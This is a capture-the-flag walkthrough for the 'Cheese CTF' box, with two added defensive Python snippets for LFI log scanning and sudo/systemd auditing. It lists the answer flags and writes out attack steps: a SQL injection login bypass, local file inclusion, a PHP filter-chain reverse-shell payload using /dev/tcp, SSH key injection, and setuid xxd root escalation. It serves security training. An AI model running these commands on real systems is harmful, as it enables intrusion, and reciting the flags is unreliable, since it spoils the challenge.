Task 1. Flags: Cheese CTF

The document details a Capture The Flag (CTF) challenge involving hacking into a machine to retrieve user and root flags. It outlines the steps taken, including network scanning, web enumeration, SQL injection, local file inclusion, and privilege escalation to gain access to the flags. The user flag is THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a} and the root flag is THM{dca75486094810807faf4b7b0a929b11e5e0167c}.

Uploaded by vishnuunni635
© All Rights Reserved

Cheese CTF

Task 1. Flags
Hack into the machine and get the flags!

What is the user.txt flag?


THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}

What is the root.txt flag?


THM{dca75486094810807faf4b7b0a929b11e5e0167c}

Let's start by scanning the network.


death@esther:~$ nmap 10.10.228.119 -sV -T 4

PORT STATE SERVICE VERSION


1/tcp open tcpmux?
3/tcp open compressnet?
340/tcp open http Motorola cable modem webadmin
366/tcp open odmr?
389/tcp open telnet Allied Telesis x900-series switch telnetd
406/tcp open melange Melange Chat Server 3VhUqW
407/tcp open pop3-proxy AVG pop3 proxy 346/67007
416/tcp open silverplatter?
417/tcp open onmux?
425/tcp open telnet
427/tcp open telnet
443/tcp open https?
444/tcp open smtp IMail NT-ESMTP ..._.p..c
445/tcp open http Corel Paradox relational database web interface 9.X (Embedded BWS 1.0b3)
458/tcp open printer Microsoft lpd

There are lots of ports open; the best part is that HTTP is open, so let's hop over to the website.

Let's enumerate the web directories:
dirsearch -u 10.10.228.119
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API.
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3


(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25


Wordlist size: 11460

Output File: /home/death/reports/_10.10.228.119/_24-09-28_01-34-24.txt

Target: http://10.10.228.119/

[01:34:24] Starting:
[01:34:33] 403 - 278B - /.ht_wsr.txt
[01:34:33] 403 - 278B - /.htaccess.bak1
[01:34:33] 403 - 278B - /.htaccess.sample
[01:34:33] 403 - 278B - /.htaccess.orig
[01:34:33] 403 - 278B - /.htaccess.save
[01:34:33] 403 - 278B - /.htaccess_orig
[01:34:33] 403 - 278B - /.htaccess_extra
[01:34:33] 403 - 278B - /.htaccessBAK
[01:34:33] 403 - 278B - /.htaccess_sc
[01:34:33] 403 - 278B - /.htaccessOLD2
[01:34:33] 403 - 278B - /.htaccessOLD
[01:34:33] 403 - 278B - /.html
[01:34:33] 403 - 278B - /.htpasswd_test
[01:34:33] 403 - 278B - /.htm
[01:34:33] 403 - 278B - /.htpasswds
[01:34:33] 403 - 278B - /.httr-oauth
[01:34:35] 403 - 278B - /.php
[01:35:14] 301 - 315B - /images -> http://10.10.228.119/images/
[01:35:14] 200 - 485B - /images/
[01:35:18] 200 - 370B - /login.php
[01:35:25] 200 - 254B - /orders.html
[01:35:34] 403 - 278B - /server-status/
[01:35:34] 403 - 278B - /server-status
[01:35:43] 200 - 254B - /users.html

Task Completed

Let's take a look at the login page.

As we don't have any credentials, let's try SQL injection; maybe we get something:
' || '1'='1';-- -

I got access.

The website is completely blank, but there is a message link; let's click on it.

There is something here.

It's a clue.

We can see the path http://10.10.228.119/secret-script.php?file=php://filter/resource=supersecretmessageforadmin. Since the file parameter takes a whole path, let's try LFI and exploit it.

Jackpot:
http://10.10.228.119/secret-script.php?file=/etc/passwd

Let's create a reverse shell payload.


git clone https://github.com/synacktiv/php_filter_chain_generator.git && cd php_filter_chain_generator && clear && l

python3 php_filter_chain_generator.py --chain "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/PUT-YOUR-IP-HERE/4444

Our reverse shell payload is ready.

Open netcat in another terminal:


nc -lnvp 4444

Let's send this payload using curl:


curl "http://10.10.228.119/secret-script.php?file=$(cat payload.txt)"

Here we get our shell.
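As an added defender-side example (not part of the original walkthrough), this Python snippet scans Apache access-log lines for the LFI indicators this box exposes: a php:// stream wrapper in the file parameter, an absolute or traversal path such as /etc/passwd, and stacked convert.* filters like those a filter-chain generator produces. The log lines and client IPs are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not captured from the box): the
# first three mirror the requests in the walkthrough, the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2024:01:40:01 +0000] "GET /secret-script.php?file=php://filter/resource=supersecretmessageforadmin HTTP/1.1" 200 512
10.0.0.5 - - [28/Sep/2024:01:40:09 +0000] "GET /secret-script.php?file=/etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [28/Sep/2024:01:41:30 +0000] "GET /secret-script.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7/resource=php://temp HTTP/1.1" 200 17
10.0.0.7 - - [28/Sep/2024:01:42:00 +0000] "GET /secret-script.php?file=supersecretmessageforadmin HTTP/1.1" 200 512
10.0.0.7 - - [28/Sep/2024:01:42:05 +0000] "GET /images/cheese.png HTTP/1.1" 200 9211
"""

REQ_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|file|glob)://', re.I)

def classify(value: str) -> list[str]:
    """Return the LFI indicators found in one query-parameter value."""
    v = unquote(value)
    reasons = []
    if WRAPPER_RE.match(v):
        reasons.append("php-stream-wrapper")
    if v.startswith("/") or ".." in v:
        reasons.append("absolute-or-traversal-path")
    if v.count("convert.") >= 2:  # stacked filters = filter-chain payload
        reasons.append("filter-chain")
    return reasons

def scan_log(text: str, params=("file",)):
    """Return (line_no, client_ip, reasons) for every request whose
    file-type parameter carries an LFI indicator."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for p in params:
            for val in qs.get(p, []):
                reasons = classify(val)
                if reasons:
                    findings.append((n, line.split()[0], reasons))
    return findings

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```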

Let's escalate privileges.

Open a Python HTTP server on our system.

Let's download linpeas from our system.

Linpeas found /home/comte/.ssh/authorized_keys, which can be modified.

We can create our own SSH key pair on our machine and add the public key to this file,
allowing us to log in as that user.

Let's create an SSH key on our system:
ssh-keygen -t rsa

Let's view the public key:


death@esther:~$ cat .ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0ABrr0Cw

Let's add it to the file:


echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0A
" >> /home/comte/.ssh/authorized_keys

Log in through SSH:


ssh -i id_rsa comte@10.10.228.119

USER FLAG
comte@cheesectf:~$ cat user.txt

THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}

Let's see comte's privileges.

comte@cheesectf:~$ sudo -l
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
comte@cheesectf:~$

We can execute systemctl without a password, and the unit file exploit.timer is modifiable, so it can be
used to run the exploit service.

Let's view that service file:

comte@cheesectf:/etc/systemd/system$ cat exploit.service

[Unit]
Description=Exploit Service

[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"

The service copies xxd to /opt/xxd and sets the setuid bit on it.

Let's view the timer file:


comte@cheesectf:/etc/systemd/system$ cat exploit.timer
[Unit]
Description=Exploit Timer

[Timer]
OnBootSec=

[Install]
WantedBy=timers.target
comte@cheesectf:/etc/systemd/system$

Let's set a time on it.

Running the timer will trigger the service and thus xxd. If you don't know about xxd, it's a binary for hex dumps; we can
read about its abuse potential on GTFOBins.

According to GTFOBins, with a setuid copy of xxd we can simply write the SSH key we generated
into root's authorized_keys and gain root privileges.
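As an added audit example (not from the original page), this Python snippet parses the sudo -l output and the unit file shown above, constructed here inline, and flags the combination a defender should look for: passwordless systemctl rules plus a unit whose ExecStart plants a setuid binary. Whether the unit file is writable is passed in as a flag because the snippet runs offline.

```python
import re

# Constructed inputs (typed in for the example, not captured verbatim): they
# mirror the sudo -l output and exploit.service the walkthrough shows.
SUDO_L = """\
User comte may run the following commands on cheesectf:
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) NOPASSWD: /bin/systemctl restart exploit.timer
    (ALL) NOPASSWD: /bin/systemctl start exploit.timer
    (ALL) NOPASSWD: /bin/systemctl enable exploit.timer
"""
EXPLOIT_SERVICE = """\
[Unit]
Description=Exploit Service
[Service]
Type=oneshot
ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
"""

RULE_RE = re.compile(r'\(\w+\)\s+NOPASSWD:\s+(?P<cmd>\S+)\s*(?P<args>.*)')
# symbolic (+s, u+s, +sx) or octal (4xxx/2xxx/6xxx) setuid/setgid chmod
SETUID_RE = re.compile(r'chmod\s+[ugoa]*\+[rwx]*s|chmod\s+[0-7]?[4267][0-7]{3}')

def audit_sudo(sudo_output: str) -> list[str]:
    """Flag NOPASSWD systemctl rules: with a user-writable unit they let the
    user run arbitrary commands as root without a password."""
    findings = []
    for m in RULE_RE.finditer(sudo_output):
        cmd, args = m.group("cmd"), m.group("args").strip()
        if cmd.endswith("systemctl"):
            verb = args.split()[0] if args else "*"
            findings.append(f"NOPASSWD systemctl {verb}: {cmd} {args}".strip())
    return findings

def audit_unit(unit_text: str, writable_by_user: bool) -> list[str]:
    """Flag an ExecStart that creates a setuid/setgid binary, and any unit an
    unprivileged user can edit (systemd runs it as root)."""
    findings = []
    for line in unit_text.splitlines():
        if line.startswith("ExecStart=") and SETUID_RE.search(line):
            findings.append("ExecStart sets the setuid bit: " + line[len("ExecStart="):])
    if writable_by_user:
        findings.append("unit file is writable by an unprivileged user")
    return findings

if __name__ == "__main__":
    print(*audit_sudo(SUDO_L), *audit_unit(EXPLOIT_SERVICE, True), sep="\n")
```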

First, let's reload and start the timer:


sudo systemctl daemon-reload

sudo systemctl start exploit.timer

Let's write our SSH public key into root's authorized_keys with the setuid xxd:


echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDAFK2k5zBYD1W7EtVkTHU6WcmMw/TOS7WpXtZsiR6QmgwZWv7KzZ43OVTXJ22s8os5NnLp0A

Let's log in with SSH as root:


ssh -i id_rsa root@10.10.228.119

ROOT FLAG
root@cheesectf:~# cat /root/root.txt
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|

THM{dca75486094810807faf4b7b0a929b11e5e0167c}
